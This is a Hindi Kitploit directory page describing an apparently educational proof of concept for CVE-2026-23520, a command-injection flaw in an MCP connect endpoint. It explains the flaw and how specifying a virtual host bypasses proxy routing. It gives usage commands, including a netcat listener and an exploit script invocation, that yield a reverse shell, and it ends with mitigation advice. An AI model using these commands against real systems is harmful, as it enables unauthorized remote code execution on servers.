Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
-Educational-PoC-CVE-2026-23520 — 🎓 CVE-2026-23520 के लिए शैक्षिक PoC। भेद्यता विश्लेषण और नियंत्रित शमन प्रयोगशाला। 🧪 | Kitploit
उपकरण/GitHubGitHub/kikechans/-educational-poc-cve-2026-23520
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubkikechans/-educational-poc-cve-2026-23520

-Educational-PoC-CVE-2026-23520

🎓 CVE-2026-23520 के लिए शैक्षिक PoC। भेद्यता विश्लेषण और नियंत्रित शमन प्रयोगशाला। 🧪

रिपॉजिटरी देखें
33 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23520: Model Context Protocol (MCP) Connect RCE - शैक्षिक PoC - Arcane

अस्वीकरण: यह रिपॉजिटरी और इसमें शामिल स्क्रिप्ट्स केवल शैक्षिक और अकादमिक उद्देश्यों के लिए हैं।

यहां प्रदान की गई जानकारी का उद्देश्य सुरक्षा शोधकर्ताओं, सिस्टम प्रशासकों और छात्रों को नियंत्रित प्रयोगशाला वातावरण (जैसे Capture The Flag प्लेटफॉर्म) में कमांड इंजेक्शन कमजोरियों और वर्चुअल होस्ट रूटिंग की कार्यप्रणाली को समझने में मदद करना है।

इस उपकरण का उपयोग कभी भी मालिक की स्पष्ट, लिखित अनुमति के बिना किसी भी सिस्टम, नेटवर्क या बुनियादी ढांचे के खिलाफ न करें। लेखक इस सॉफ्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेते हैं।


संदर्भ और कमजोरी का अवलोकन

यह रिपॉजिटरी कुछ एप्लिकेशन स्टैक (जैसे Arcane v1.13.0) में Model Context Protocol (MCP) कार्यान्वयन के संदर्भ में CVE-2026-23520 का शोषण करने के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) प्रदान करती है।

दोष

यह कमजोरी एक क्लासिक कमांड इंजेक्शन दोष है। API एंडपॉइंट (/api/mcp/connect) एक नया सर्वर कनेक्शन कॉन्फ़िगर करने के लिए JSON पेलोड स्वीकार करता है। पेलोड में serverConfig ऑब्जेक्ट शामिल है जिसमें command और args फ़ील्ड होते हैं।

चूंकि एप्लिकेशन होस्ट ऑपरेटिंग सिस्टम पर निष्पादित करने से पहले इन फ़ील्ड्स को ठीक से स्वच्छ नहीं करता, एक हमलावर वैध सेवा पथ के बजाय दुर्भावनापूर्ण bash कमांड (जैसे रिवर्स शेल) प्रदान कर सकता है।

पकड़ (वर्चुअल होस्ट रूटिंग)

कई वास्तविक दुनिया या CTF तैनातियों में, मुख्य IP पते पर केवल एक्सप्लॉइट भेजने से 404 Not Found त्रुटि उत्पन्न होगी। ऐसा इसलिए होता है क्योंकि कमजोर घटक (जैसे MCPJam Inspector) एक रिवर्स प्रॉक्सी (जैसे Nginx) के पीछे होस्ट किया गया है जो Host हेडर के आधार पर ट्रैफ़िक को रूट करता है।

यह PoC उपयोगकर्ता को प्रॉक्सी रूटिंग नियमों को बायपास करने और कमजोर एप्लिकेशन पर सीधे हमला करने के लिए वर्चुअल होस्ट (vhost) निर्दिष्ट करने की स्पष्ट अनुमति देकर मानक एक्सप्लॉइट से अलग है।

उपयोग

इस स्क्रिप्ट के लिए Python 3 और requests लाइब्रेरी की आवश्यकता है।

root@kitploit:~
pip install requests

सिंटैक्स

root@kitploit:~
python3 exploit_vhost.py <target_ip> <target_port> <virtual_host> <listener_ip> <listener_port>

उदाहरण (CTF वातावरण)

  1. अपनी मशीन पर एक netcat लिसनर सेट करें:
root@kitploit:~
nc -lvnp 4444
  1. छिपे हुए वर्चुअल होस्ट को निर्दिष्ट करते हुए एक्सप्लॉइट चलाएं:
root@kitploit:~
python3 exploit_vhost.py 10.129.x.x 443 mcp.target.local 10.10.x.x 4444

नोट: "Read timed out" त्रुटि अपेक्षित है और यह इंगित करती है कि रिवर्स शेल सफलतापूर्वक निष्पादित हो गया है और कनेक्शन को खुला रख रहा है।

शमन

प्रशासकों को यह सुनिश्चित करना चाहिए कि वे सॉफ्टवेयर का नवीनतम पैच किया गया संस्करण चला रहे हैं। यदि पैच करना तुरंत संभव नहीं है, तो /api/mcp/connect एंडपॉइंट तक पहुंच प्रतिबंधित करें और सुनिश्चित करें कि सभी serverConfig पैरामीटर्स पर सख्त इनपुट सत्यापन लागू किया गया है।

टूल डाउनलोड करें